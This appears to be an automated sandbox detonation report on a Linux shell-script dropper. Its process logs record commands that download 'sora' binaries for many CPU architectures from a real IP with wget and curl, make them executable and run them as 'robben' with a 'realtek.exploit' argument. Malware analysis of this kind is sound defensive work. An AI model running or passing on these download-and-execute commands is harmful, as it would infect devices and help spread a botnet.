N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh N/A

Processes

/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh

[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]

/tmp/robben

[./robben realtek.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-18 02:36

Reported

2024-10-18 02:39

Platform

debian9-mipsel-20240611-en

Max time kernel

32s

Max time network

60s

Command Line

[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh N/A

Processes

/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh

[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]

/tmp/robben

[./robben realtek.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A